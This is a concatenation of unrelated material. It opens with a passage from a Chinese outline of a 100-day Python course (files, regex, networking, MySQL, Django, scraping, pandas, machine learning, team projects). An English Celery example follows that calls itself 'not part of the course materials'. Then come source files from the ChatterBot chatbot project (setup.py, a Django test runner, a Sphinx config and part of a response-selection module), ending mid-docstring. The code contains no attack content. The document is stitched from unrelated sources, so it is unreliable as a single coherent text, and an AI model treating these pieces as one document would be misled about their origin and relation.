自定义分数类 #### Day10 - [图形用户界面和游戏开发](./Day01-15/10.图形用户界面和游戏开发.md) - 使用`tkinter`开发GUI程序 - 使用`pygame`三方库开发游戏应用 - “大球吃小球”游戏 #### Day11 - [文件和异常](./Day01-15/11.文件和异常.md) - 读文件 - 读取整个文件 / 逐行读取 / 文件路径 - 写文件 - 覆盖写入 / 追加写入 / 文本文件 / 二进制文件 - 异常处理 - 异常机制的重要性 / `try`-`except`代码块 / `else`代码块 / `finally`代码块 / 内置异常类型 / 异常栈 / `raise`语句 - 数据持久化 - CSV文件概述 / `csv`模块的应用 / JSON数据格式 / `json`模块的应用 #### Day12 - [字符串和正则表达式](./Day01-15/12.字符串和正则表达式.md) - 字符串高级操作 - 转义字符 / 原始字符串 / 多行字符串 / `in`和`not in`运算符 / `is_xxx`方法 / `join`和`split`方法 / `strip`相关方法 / `pyperclip`模块 / 不变字符串和可变字符串 / `StringIO`的使用 - 正则表达式入门 - 正则表达式的作用 / 元字符 / 转义 / 量词 / 分组 / 零宽断言 /贪婪匹配与惰性匹配懒惰 / 使用`re`模块实现正则表达式操作(匹配、搜索、替换、捕获) - 使用正则表达式 - `re`模块 / `compile`函数 / `group`和`groups`方法 / `match`方法 / `search`方法 / `findall`和`finditer`方法 / `sub`和`subn`方法 / 
`split`方法 - 应用案例 - 使用正则表达式验证输入的字符串 #### Day13 - [进程和线程](./Day01-15/13.进程和线程.md) - 进程和线程的概念 - 什么是进程 / 什么是线程 / 多线程的应用场景 - 使用进程 - `fork`函数 / `multiprocessing`模块 / 进程池 / 进程间通信 - 使用线程 - `threading`模块 / `Thread`类 / `RLock`类 / `Condition`类 / 线程池 #### Day14 - [网络编程入门和网络应用开发](./Day01-15/14.网络编程入门和网络应用开发.md) - 计算机网络基础 - 计算机网络发展史 / “TCP-IP”模型 / IP地址 / 端口 / 协议 / 其他相关概念 - 网络应用模式 - “客户端-服务器”模式 / “浏览器-服务器”模式 - 基于HTTP协议访问网络资源 - 网络API概述 / 访问URL / `requests`三方库 / 解析JSON格式数据 - Python网络编程 - 套接字的概念 / `socket`模块 / `socket`函数 / 创建TCP服务器 / 创建TCP客户端 / 创建UDP服务器 / 创建UDP客户端 - 电子邮件 - SMTP协议 / POP3协议 / IMAP协议 / `smtplib`模块 / `poplib`模块 / `imaplib`模块 - 短信服务 - 调用短信服务网关 #### Day15 - [图像和文档处理](./Day01-15/15.图像和办公文档处理.md) - 用Pillow处理图片 - 图片读写 / 图片合成 / 几何变换 / 色彩转换 / 滤镜效果 - 读写Word文档 - 文本内容的处理 / 段落 / 页眉和页脚 / 样式的处理 - 读写Excel文件 - `xlrd` / `xlwt` / `openpyxl` ### Day16~Day20 - [Python语言进阶 ](./Day16-20/16-20.Python语言进阶.md) - 常用数据结构 - 函数的高级用法 - “一等公民” / 高阶函数 / Lambda函数 / 作用域和闭包 / 装饰器 - 面向对象高级知识 - “三大支柱” / 类与类之间的关系 / 垃圾回收 / 魔术属性和方法 / 混入 / 元类 / 面向对象设计原则 / GoF设计模式 - 迭代器和生成器 - 相关魔术方法 / 创建生成器的两种方式 / - 并发和异步编程 - 多线程 / 多进程 / 异步IO / `async`和`awai`t ### Day21~30 - [Web前端入门](./Day21-30/21-30.Web前端概述.md) - 用HTML标签承载页面内容 - 用CSS渲染页面 - 用JavaScript处理交互式行为 - jQuery入门和提高 - Vue.js入门 - Element的使用 - Bootstrap的使用 ### Day31~35 - [玩转Linux操作系统](./Day31-35/31-35.玩转Linux操作系统.md) - 操作系统发展史和Linux概述 - Linux基础命令 - Linux中的实用程序 - Linux的文件系统 - Vim编辑器的应用 - 环境变量和Shell编程 - 软件的安装和服务的配置 - 网络访问和管理 - 其他相关内容 ### Day36~45 - 数据库基础和进阶 #### Day36 - [关系型数据库和MySQL概述](./Day36-45/36.关系型数据库和MySQL概述.md) - 关系型数据库概述 - MySQL简介 - 安装MySQL - MySQL基本命令 #### Day37 - [SQL详解之DDL](./Day36-45/37.SQL详解之DDL.md) - 建库建表 - 删除表和修改表 #### Day38 - [SQL详解之DML](./Day36-45/38.SQL详解之DML.md) - insert操作 - delete操作 - update操作 #### Day39 - [SQL详解之DQL](./Day36-45/39.SQL详解之DQL.md) - 投影和别名 - 筛选数据 - 空值处理 - 去重 - 排序 - 聚合函数 - 嵌套查询 - 分组 - 表连接 - 笛卡尔积 - 内连接 - 自然连接 - 外连接 - 窗口函数 - 定义窗口 - 排名函数 - 取数函数 #### Day40 - [SQL详解之DCL](./Day36-45/40.SQL详解之DCL.md) - 创建用户 - 授予权限 - 召回权限 #### Day41 - [MySQL新特性](./Day36-45/41.MySQL新特性.md) - JSON类型 - 窗口函数 - 公共表表达式 #### Day42 - [视图、函数和过程](./Day36-45/42.视图、函数和过程.md) - 视图 - 使用场景 - 创建视图 - 使用限制 - 函数 - 内置函数 - 用户自定义函数(UDF) - 过程 - 创建过程 - 调用过程 #### Day43 - [索引](./Day36-45/43.索引.md) - 执行计划 - 索引的原理 - 创建索引 - 普通索引 - 唯一索引 - 前缀索引 - 复合索引 - 注意事项 #### Day44 - [Python接入MySQL数据库](./Day36-45/44.Python接入MySQL数据库.md) - 安装三方库 - 创建连接 - 获取游标 - 执行SQL语句 - 通过游标抓取数据 - 事务提交和回滚 - 释放连接 - 编写ETL脚本 #### Day45 - [大数据平台和HiveSQL](./Day36-45/45.大数据平台和HiveSQL.md) - Hadoop生态圈 - Hive概述 - 准备工作 - 数据类型 - DDL操作 - DML操作 - 数据查询 ### Day46~60 - 实战Django #### Day46 - [Django快速上手](./Day46-60/46.Django快速上手.md) - Web应用工作机制 - HTTP请求和响应 - Django框架概述 - 5分钟快速上手 #### Day47 - [深入模型](./Day46-60/47.深入模型.md) - 关系型数据库配置 - 使用ORM完成对模型的CRUD操作 - 管理后台的使用 - Django模型最佳实践 - 模型定义参考 #### Day48 - [静态资源和Ajax请求](./Day46-60/48.静态资源和Ajax请求.md) - 加载静态资源 - Ajax概述 - 用Ajax实现投票功能 #### Day49 - [Cookie和Session](./Day46-60/49.Cookie和Session.md) - 实现用户跟踪 - cookie和session的关系 - Django框架对session的支持 - 视图函数中的cookie读写操作 #### Day50 - [报表和日志](./Day46-60/50.制作报表.md) - 通过`HttpResponse`修改响应头 - 使用`StreamingHttpResponse`处理大文件 - 使用`xlwt`生成Excel报表 - 使用`reportlab`生成PDF报表 - 使用ECharts生成前端图表 #### Day51 - [日志和调试工具栏](./Day46-60/51.日志和调试工具栏.md) - 配置日志 - 配置Django-Debug-Toolbar - 优化ORM代码 #### Day52 - [中间件的应用](./Day46-60/52.中间件的应用.md) - 什么是中间件 - Django框架内置的中间件 - 自定义中间件及其应用场景 #### Day53 - [前后端分离开发入门](./Day46-60/53.前后端分离开发入门.md) - 返回JSON格式的数据 - 用Vue.js渲染页面 #### Day54 - [RESTful架构和DRF入门](./Day46-60/54.RESTful架构和DRF入门.md) - REST概述 - DRF库使用入门 - 前后端分离开发 - JWT的应用 #### Day55 - 
[RESTful架构和DRF进阶](./Day46-60/55.RESTful架构和DRF进阶.md) - 使用CBV - 数据分页 - 数据筛选 #### Day56 - [使用缓存](./Day46-60/56.使用缓存.md) - 网站优化第一定律 - 在Django项目中使用Redis提供缓存服务 - 在视图函数中读写缓存 - 使用装饰器实现页面缓存 - 为数据接口提供缓存服务 #### Day57 - [接入三方平台](./Day46-60/57.接入三方平台.md) - 文件上传表单控件和图片文件预览 - 服务器端如何处理上传的文件 #### Day58 - [异步任务和定时任务](./Day46-60/58.异步任务和定时任务.md) - 网站优化第二定律 - 配置消息队列服务 - 在项目中使用Celery实现任务异步化 - 在项目中使用Celery实现定时任务 #### Day59 - [单元测试](./Day46-60/59.单元测试.md) #### Day60 - [项目上线](./Day46-60/60.项目上线.md) - Python中的单元测试 - Django框架对单元测试的支持 - 使用版本控制系统 - 配置和使用uWSGI - 动静分离和Nginx配置 - 配置HTTPS - 配置域名解析 ### Day61~65 - [爬虫开发](./Day61-65) #### Day61 - [网络数据采集概述](./Day61-65/61.网络数据采集概述.md) - 网络爬虫的概念及其应用领域 - 网络爬虫的合法性探讨 - 开发网络爬虫的相关工具 - 一个爬虫程序的构成 #### Day62 - 数据抓取和解析 - [使用`requests`三方库实现数据抓取](./Day61-65/62.用Python获取网络资源-1.md) - [页面解析的三种方式](./Day61-65/62.用Python解析HTML页面-2.md) - 正则表达式解析 - XPath解析 - CSS选择器解析 #### Day63 - Python中的并发编程 - [多线程](./Day61-65/63.Python中的并发编程-1.md) - [多进程](./Day61-65/63.Python中的并发编程-2.md) - [异步I/O](./Day61-65/63.Python中的并发编程-3.md) #### Day64 - [使用Selenium抓取网页动态内容](./Day61-65/64.使用Selenium抓取网页动态内容.md) - 安装Selenium - 加载页面 - 查找元素和模拟用户行为 - 隐式等待和显示等待 - 执行JavaScript代码 - Selenium反爬破解 - 设置无头浏览器 #### Day65 - [爬虫框架Scrapy简介](./Day61-65/65.爬虫框架Scrapy简介.md) - Scrapy核心组件 - Scrapy工作流程 - 安装Scrapy和创建项目 - 编写蜘蛛程序 - 编写中间件和管道程序 - Scrapy配置文件 ### Day66~80 - 数据分析 #### Day66 - [数据分析概述](./Day66-80/66.数据分析概述.md) - 数据分析师的职责 - 数据分析师的技能栈 - 数据分析相关库 #### Day67 - [环境准备](./Day66-80/67.环境准备.md) - 安装和使用anaconda - conda相关命令 - 安装和使用jupyter-lab - 安装和启动 - 使用小技巧 #### Day68 - [NumPy的应用-1](./Day66-80/68.NumPy的应用-1.md) - 创建数组对象 - 数组对象的属性 - 数组对象的索引运算 - 普通索引 - 花式索引 - 布尔索引 - 切片索引 - 案例:使用数组处理图像 #### Day69 - [NumPy的应用-2](./Day66-80/69.NumPy的应用-2.md) - 数组对象的相关方法 - 获取描述性统计信息 - 其他相关方法 #### Day70 - [NumPy的应用-3](./Day66-80/70.NumPy的应用-3.md) - 数组的运算 - 数组跟标量的运算 - 数组跟数组的运算 - 通用一元函数 - 通用二元函数 - 广播机制 - Numpy常用函数 #### Day71 - [NumPy的应用-4](./Day66-80/71.NumPy的应用-4.md) - 向量 - 行列式 - 矩阵 - 多项式 #### Day72 - [深入浅出pandas-1](./Day66-80/72.深入浅出pandas-1.md) - 创建`Series`对象 - `Series`对象的运算 - `Series`对象的属性和方法 #### Day73 - [深入浅出pandas-2](./Day66-80/73.深入浅出pandas-2.md) - 创建`DataFrame`对象 - `DataFrame`对象的属性和方法 - 读写`DataFrame`中的数据 #### Day74 - [深入浅出pandas-3](./Day66-80/74.深入浅出pandas-3.md) - 数据重塑 - 数据拼接 - 数据合并 - 数据清洗 - 缺失值 - 重复值 - 异常值 - 预处理 #### Day75 - [深入浅出pandas-4](./Day66-80/75.深入浅出pandas-4.md) - 数据透视 - 获取描述性统计信息 - 排序和头部值 - 分组聚合 - 透视表和交叉表 - 数据呈现 #### Day76 - [深入浅出pandas-5](./Day66-80/76.深入浅出pandas-5.md) - 计算同比环比 - 窗口计算 - 相关性判定 #### Day77 - [深入浅出pandas-6](./Day66-80/77.深入浅出pandas-6.md) - 索引的使用 - 范围索引 - 分类索引 - 多级索引 - 间隔索引 - 日期时间索引 #### Day78 - [数据可视化-1](./Day66-80/78.数据可视化-1.md) - 安装和导入matplotlib - 创建画布 - 创建坐标系 - 绘制图表 - 折线图 - 散点图 - 柱状图 - 饼状图 - 直方图 - 箱线图 - 显示和保存图表 #### Day79 - [数据可视化-2](./Day66-80/79.数据可视化-2.md) - 高阶图表 - 气泡图 - 面积图 - 雷达图 - 玫瑰图 - 3D图表 #### Day80 - [数据可视化-3](./Day66-80/80.数据可视化-3.md) - Seaborn - Pyecharts ### Day81~90 - [机器学习和深度学习](./Day81-90) #### Day81 - [机器学习基础](./Day81-90/81.机器学习基础.md) #### Day82 - [k最近邻分类](./Day81-90/82.k最近邻分类.md) #### Day83 - [决策树](./Day81-90/83.决策树.md) #### Day84 - [贝叶斯分类](./Day81-90/84.贝叶斯分类.md) #### Day85 - [支持向量机](./Day81-90/85.支持向量机.md) #### Day86 - [K-均值聚类](./Day81-90/86.K-均值聚类.md) #### Day87 - [回归分析](./Day81-90/87.回归分析.md) #### Day88 - [深度学习入门](./Day81-90/88.深度学习入门.md) #### Day89 - [PyTorch概述](./Day81-90/89.PyTorch概述.md) #### Day90 - [PyTorch实战](./Day81-90/90.PyTorch实战.md) ### Day91~100 - [团队项目开发](./Day91-100) #### 第91天:[团队项目开发的问题和解决方案](./Day91-100/91.团队项目开发的问题和解决方案.md) 1. 
软件过程模型 - 经典过程模型(瀑布模型) - 可行性分析(研究做还是不做),输出《可行性分析报告》。 - 需求分析(研究做什么),输出《需求规格说明书》和产品界面原型图。 - 概要设计和详细设计,输出概念模型图(ER图)、物理模型图、类图、时序图等。 - 编码 / 测试。 - 上线 / 维护。 瀑布模型最大的缺点是无法拥抱需求变化,整套流程结束后才能看到产品,团队士气低落。 - 敏捷开发(Scrum)- 产品所有者、Scrum Master、研发人员 - Sprint - 产品的Backlog(用户故事、产品原型)。 - 计划会议(评估和预算)。 - 日常开发(站立会议、番茄工作法、结对编程、测试先行、代码重构……)。 - 修复bug(问题描述、重现步骤、测试人员、被指派人)。 - 发布版本。 - 评审会议(Showcase,用户需要参与)。 - 回顾会议(对当前迭代周期做一个总结)。 > 补充:敏捷软件开发宣言 > > - **个体和互动** 高于 流程和工具 > - **工作的软件** 高于 详尽的文档 > - **客户合作** 高于 合同谈判 > - **响应变化** 高于 遵循计划 ![](./res/agile-scrum-sprint-cycle.png) > 角色:产品所有者(决定做什么,能对需求拍板的人)、团队负责人(解决各种问题,专注如何更好的工作,屏蔽外部对开发团队的影响)、开发团队(项目执行人员,具体指开发人员和测试人员)。 > 准备工作:商业案例和资金、合同、憧憬、初始产品需求、初始发布计划、入股、组建团队。 > 敏捷团队通常人数为8-10人。 > 工作量估算:将开发任务量化,包括原型、Logo设计、UI设计、前端开发等,尽量把每个工作分解到最小任务量,最小任务量标准为工作时间不能超过两天,然后估算总体项目时间。把每个任务都贴在看板上面,看板上分三部分:to do(待完成)、in progress(进行中)和done(已完成)。 2. 项目团队组建 - 团队的构成和角色 > 说明:感谢**付祥英**女士帮助我绘制了下面这张精美的公司组织架构图。 ![company_architecture](./res/company_architecture.png) - 编程规范和代码审查(`flake8`、`pylint`) ![](./res/pylint.png) - Python中的一些“惯例”(请参考[《Python惯例-如何编写Pythonic的代码》](Python惯例.md)) - 影响代码可读性的原因: - 代码注释太少或者没有注释 - 代码破坏了语言的最佳实践 - 反模式编程(意大利面代码、复制-黏贴编程、自负编程、……) 3. 团队开发工具介绍 - 版本控制:Git、Mercury - 缺陷管理:[Gitlab](https://about.gitlab.com/)、[Redmine](http://www.redmine.org.cn/) - 敏捷闭环工具:[禅道](https://www.zentao.net/)、[JIRA](https://www.atlassian.com/software/jira/features) - 持续集成:[Jenkins](https://jenkins.io/)、[Travis-CI](https://travis-ci.org/) 请参考[《团队项目开发的问题和解决方案》](Day91-100/91.团队项目开发的问题和解决方案.md)。 ##### 项目选题和理解业务 1. 选题范围设定 - CMS(用户端):新闻聚合网站、问答/分享社区、影评/书评网站等。 - MIS(用户端+管理端):KMS、KPI考核系统、HRS、CRM系统、供应链系统、仓储管理系统等。 - App后台(管理端+数据接口):二手交易类、报刊杂志类、小众电商类、新闻资讯类、旅游类、社交类、阅读类等。 - 其他类型:自身行业背景和工作经验、业务容易理解和把控。 2. 需求理解、模块划分和任务分配 - 需求理解:头脑风暴和竞品分析。 - 模块划分:画思维导图(XMind),每个模块是一个枝节点,每个具体的功能是一个叶节点(用动词表述),需要确保每个叶节点无法再生出新节点,确定每个叶子节点的重要性、优先级和工作量。 - 任务分配:由项目负责人根据上面的指标为每个团队成员分配任务。 ![](./res/requirements_by_xmind.png) 3. 制定项目进度表(每日更新) | 模块 | 功能 | 人员 | 状态 | 完成 | 工时 | 计划开始 | 实际开始 | 计划结束 | 实际结束 | 备注 | | ---- | -------- | ------ | -------- | ---- | ---- | -------- | -------- | -------- | -------- | ---------------- | | 评论 | 添加评论 | 王大锤 | 正在进行 | 50% | 4 | 2018/8/7 | | 2018/8/7 | | | | | 删除评论 | 王大锤 | 等待 | 0% | 2 | 2018/8/7 | | 2018/8/7 | | | | | 查看评论 | 白元芳 | 正在进行 | 20% | 4 | 2018/8/7 | | 2018/8/7 | | 需要进行代码审查 | | | 评论投票 | 白元芳 | 等待 | 0% | 4 | 2018/8/8 | | 2018/8/8 | | | 4. OOAD和数据库设计 - UML(统一建模语言)的类图 ![uml](./res/uml-class-diagram.png) - 通过模型创建表(正向工程),例如在Django项目中可以通过下面的命令创建二维表。 ```Shell python manage.py makemigrations app python manage.py migrate ``` - 使用PowerDesigner绘制物理模型图。 ![](./res/power-designer-pdm.png) - 通过数据表创建模型(反向工程),例如在Django项目中可以通过下面的命令生成模型。 ```Shell python manage.py inspectdb > app/models.py ``` #### 第92天:[Docker容器技术详解](./Day91-100/92.Docker容器技术详解.md) 1. Docker简介 2. 安装Docker 3. 使用Docker创建容器(Nginx、MySQL、Redis、Gitlab、Jenkins) 4. 构建Docker镜像(Dockerfile的编写和相关指令) 5. 容器编排(Docker-compose) 6. 集群管理(Kubernetes) #### 第93天:[MySQL性能优化](./Day91-100/93.MySQL性能优化.md) 1. 基本原则 2. InnoDB引擎 3. 索引的使用和注意事项 4. 数据分区 5. SQL优化 6. 配置优化 7. 架构优化 #### 第94天:[网络API接口设计](./Day91-100/94.网络API接口设计.md) - 设计原则 - 关键问题 - 其他问题 - 文档撰写 #### 第95天:[使用Django开发商业项目](./Day91-100/95.使用Django开发商业项 目.md) ##### 项目开发中的公共问题 1. 数据库的配置(多数据库、主从复制、数据库路由) 2. 缓存的配置(分区缓存、键设置、超时设置、主从复制、故障恢复(哨兵)) 3. 日志的配置 4. 分析和调试(Django-Debug-ToolBar) 5. 好用的Python模块(日期计算、图像处理、数据加密、三方API) ##### REST API设计 1. 
RESTful架构 - [理解RESTful架构](http://www.ruanyifeng.com/blog/2011/09/restful.html) - [RESTful API设计指南](http://www.ruanyifeng.com/blog/2014/05/restful_api.html) - [RESTful API最佳实践](http://www.ruanyifeng.com/blog/2018/10/restful-api-best-practices.html) 2. API接口文档的撰写 - [RAP2](http://rap2.taobao.org/) - [YAPI](http://yapi.demo.qunar.com/) 3. [django-REST-framework](https://www.django-rest-framework.org/)的应用 ##### 项目中的重点难点剖析 1. 使用缓存缓解数据库压力 - Redis 2. 使用消息队列做解耦合和削峰 - Celery + RabbitMQ #### 第96天:[软件测试和自动化测试](Day91-100/96.软件测试和自动化测试.md) ##### 单元测试 1. 测试的种类 2. 编写单元测试(`unittest`、`pytest`、`nose2`、`tox`、`ddt`、……) 3. 测试覆盖率(`coverage`) ##### Django项目部署 1. 部署前的准备工作 - 关键设置(SECRET_KEY / DEBUG / ALLOWED_HOSTS / 缓存 / 数据库) - HTTPS / CSRF_COOKIE_SECUR / SESSION_COOKIE_SECURE - 日志相关配置 2. Linux常用命令回顾 3. Linux常用服务的安装和配置 4. uWSGI/Gunicorn和Nginx的使用 - Gunicorn和uWSGI的比较 - 对于不需要大量定制化的简单应用程序,Gunicorn是一个不错的选择,uWSGI的学习曲线比Gunicorn要陡峭得多,Gunicorn的默认参数就已经能够适应大多数应用程序。 - uWSGI支持异构部署。 - 由于Nginx本身支持uWSGI,在线上一般都将Nginx和uWSGI捆绑在一起部署,而且uWSGI属于功能齐全且高度定制的WSGI中间件。 - 在性能上,Gunicorn和uWSGI其实表现相当。 5. 使用虚拟化技术(Docker)部署测试环境和生产环境 ##### 性能测试 1. AB的使用 2. SQLslap的使用 3. sysbench的使用 ##### 自动化测试 1. 使用Shell和Python进行自动化测试 2. 使用Selenium实现自动化测试 - Selenium IDE - Selenium WebDriver - Selenium Remote Control 3. 测试工具Robot Framework介绍 #### 第97天:[电商网站技术要点剖析](./Day91-100/97.电商网站技术要点剖析.md) 1. 商业模式和需求要点 2. 物理模型设计 3. 第三方登录 4. 缓存预热和查询缓存 5. 购物车的实现 6. 支付功能集成 7. 秒杀和超卖问题 8. 静态资源管理 9. 全文检索方案 #### 第98天:[项目部署上线和性能调优](./Day91-100/98.项目部署上线和性能调优.md) 1. MySQL数据库调优 2. Web服务器性能优化 - Nginx负载均衡配置 - Keepalived实现高可用 3. 代码性能调优 - 多线程 - 异步化 4. 静态资源访问优化 - 云存储 - CDN #### 第99天:[面试中的公共问题](./Day91-100/99.面试中的公共问题.md) - 计算机基础 - Python基础 - Web框架相关 - 爬虫相关问题 - 数据分析 - 项目相关 #### 第100天:[Python面试题实录](./Day91-100/100.Python面试题实录.md)
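Day58 and the Day95 "项目中的重点难点剖析" section above both point to Celery with RabbitMQ for moving slow work (emails, reports, scheduled cleanup) out of the request/response cycle and for running periodic jobs. The sketch below is illustrative only and is not part of the course materials; the module, task, and broker names are placeholders, while the `Celery` calls themselves are the library's standard API:

```Python
from celery import Celery

# Placeholder broker URL for a local RabbitMQ instance (illustrative only)
app = Celery('demo_tasks', broker='amqp://guest:guest@localhost:5672//')

# Periodic-task schedule (the "定时任务" case): celery beat reads this
# configuration and enqueues the named task once per hour
app.conf.beat_schedule = {
    'cleanup-every-hour': {
        'task': 'demo_tasks.cleanup_expired_orders',
        'schedule': 3600.0,
    },
}


@app.task
def send_welcome_email(user_id):
    """Hypothetical slow job: a Django view calls send_welcome_email.delay(user_id)
    and returns immediately; a worker process executes the task later."""
    print('sending welcome email to user', user_id)


@app.task(name='demo_tasks.cleanup_expired_orders')
def cleanup_expired_orders():
    """Hypothetical periodic job triggered by the beat schedule above."""
    print('cleaning up expired orders')
```

A worker process (`celery -A demo_tasks worker`) consumes the queue and a separate beat process (`celery -A demo_tasks beat`) drives the periodic schedule; the web application only ever enqueues messages, which is exactly the decoupling and load-shaving ("解耦合和削峰") the outline describes.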
ChatterBot
4ff8af28567ed446ae796d37c246bb6a14032fe7
File: setup.py #!/usr/bin/env python """ ChatterBot setup file. """ import os import sys import platform import configparser from setuptools import setup if sys.version_info[0] < 3: raise Exception( 'You are tying to install ChatterBot on Python version {}.\n' 'Please install ChatterBot in Python 3 instead.'.format( platform.python_version() ) ) config = configparser.ConfigParser() current_directory = os.path.dirname(os.path.abspath(__file__)) config_file_path = os.path.join(current_directory, 'setup.cfg') config.read(config_file_path) VERSION = config['chatterbot']['version'] AUTHOR = config['chatterbot']['author'] AUTHOR_EMAIL = config['chatterbot']['email'] URL = config['chatterbot']['url'] with open('README.md') as f: LONG_DESCRIPTION = f.read() REQUIREMENTS = [] DEPENDENCIES = [] with open('requirements.txt') as requirements: for requirement in requirements.readlines(): if requirement.startswith('git+git://'): DEPENDENCIES.append(requirement) else: REQUIREMENTS.append(requirement) setup( name='ChatterBot', version=VERSION, url=URL, download_url='{}/tarball/{}'.format(URL, VERSION), project_urls={ 'Documentation': 'https://chatterbot.readthedocs.io', }, description='ChatterBot is a machine learning, conversational dialog engine.', long_description=LONG_DESCRIPTION, long_description_content_type='text/markdown', author=AUTHOR, author_email=AUTHOR_EMAIL, packages=[ 'chatterbot', 'chatterbot.storage', 'chatterbot.logic', 'chatterbot.ext', 'chatterbot.ext.sqlalchemy_app', 'chatterbot.ext.django_chatterbot', 'chatterbot.ext.django_chatterbot.migrations', ], package_dir={'chatterbot': 'chatterbot'}, include_package_data=True, install_requires=REQUIREMENTS, dependency_links=DEPENDENCIES, python_requires='>=3.4, <=3.8', license='BSD', zip_safe=True, platforms=['any'], keywords=['ChatterBot', 'chatbot', 'chat', 'bot'], classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Environment :: Console', 'Environment :: Web Environment', 'Operating System :: OS Independent', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Communications :: Chat', 'Topic :: Internet', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3 :: Only', ], test_suite='tests' ) File: runtests.py #!/usr/bin/env python """ This is the test runner for the ChatterBot's Django tests. """ import os import sys import django from django.conf import settings from django.test.utils import get_runner if __name__ == '__main__': os.environ['DJANGO_SETTINGS_MODULE'] = 'tests_django.test_settings' django.setup() TestRunner = get_runner(settings) test_runner = TestRunner( verbosity=2 ) failures = test_runner.run_tests(['tests_django']) sys.exit(bool(failures)) File: docs/conf.py import os import sys import configparser from datetime import datetime import sphinx_rtd_theme config = configparser.ConfigParser() current_directory = os.path.dirname(os.path.abspath(__file__)) parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir)) config_file_path = os.path.join(parent_directory, 'setup.cfg') config.read(config_file_path) # Insert the project root dir as the first element in the PYTHONPATH. 
# This lets us ensure that the source package is imported, and used to generate the documentation. sys.path.insert(0, parent_directory) # Sphinx extension modules extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.autosectionlabel', 'sphinx.ext.coverage', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.mathjax', 'sphinx.ext.todo', 'sphinx.ext.viewcode' ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: source_suffix = ['.rst', '.md'] # The encoding of source files # source_encoding = 'utf-8-sig' # The master toctree document master_doc = 'index' # General information about the project project = 'ChatterBot' author = config['chatterbot']['author'] copyright = '{}, {}'.format( datetime.now().year, author ) # The full version, including alpha/beta/rc tags release = config['chatterbot']['version'] # The short X.Y version version = config['chatterbot']['version'].rsplit('.', 1)[0] language = 'en' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = [] # If true, '()' will be appended to :func: etc. cross-reference text # add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::) # add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use pygments_style = 'sphinx' # -- Options for HTML output ---------------------------------------------- html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. html_theme_options = { 'logo_only': True } html_show_sourcelink = False # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. html_logo = '../graphics/banner.png' # The name of an image file (relative to this directory) to use as a favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. html_favicon = '_static/favicon.ico' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. # html_extra_path = [] # If not None, a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. # The empty string is equivalent to '%b %d, %Y'. # html_last_updated_fmt = None # Custom sidebar templates, maps document names to template names. # html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. # html_additional_pages = {} # If false, no module index is generated. 
# html_domain_indices = True # If false, no index is generated. # html_use_index = True # Split the index into individual pages for each letter. html_split_index = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. html_show_sphinx = False # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh' html_search_language = 'en' # Output file base name for HTML help builder htmlhelp_basename = 'ChatterBotdoc' # Read the docs theme modifications html_context = { 'extra_css_files': [ '_static/style.css' ] } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]) latex_documents = [ (master_doc, 'ChatterBot.tex', u'ChatterBot Documentation', u'Gunther Cox', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section) man_pages = [ (master_doc, 'chatterbot', u'ChatterBot Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'ChatterBot', u'ChatterBot Documentation', author, 'ChatterBot', 'One line description of project.', 'Miscellaneous'), ] # -- Options for Epub output ---------------------------------------------- # Bibliographic Dublin Core info epub_title = project epub_author = author epub_publisher = author epub_copyright = copyright # A list of files that should not be packed into the epub file epub_exclude_files = ['search.html'] # Configuration for intersphinx intersphinx_mapping = { 'python': ('https://docs.python.org/3', None) } File: chatterbot/response_selection.py """ Response selection methods determines which response should be used in the event that multiple responses are generated within a logic adapter. """ import logging def get_most_frequent_response(input_statement, response_list, storage=None): """ :param input_statement: A statement, that closely matches an input to the chat bot. :type input_statement: Statement :param response_list: A list of statement options to choose a response from. :type response_list: list :param storage: An instance of a storage adapter to allow the response selection method to access other statements if needed. :type storage: StorageAdapter :return: The response statement with the greatest number of occurrences. :rtype: Statement """ matching_response = None occurrence_count = -1 logger = logging.getLogger(__name__) logger.info('Selecting response with greatest number of occurrences.') for statement in response_list: count = len(list(storage.filter( text=statement.text, in_response_to=input_statement.text) )) # Keep the more common statement if count >= occurrence_count: matching_response = statement occurrence_count = count # Choose the most commonly occuring matching response return matching_response def get_first_response(input_statement, response_list, storage=None): """ :param input_statement: A statement, that closely matches an input to the chat bot. :type input_statement: Statement :param response_list: A list of statement options to choose a response from. 
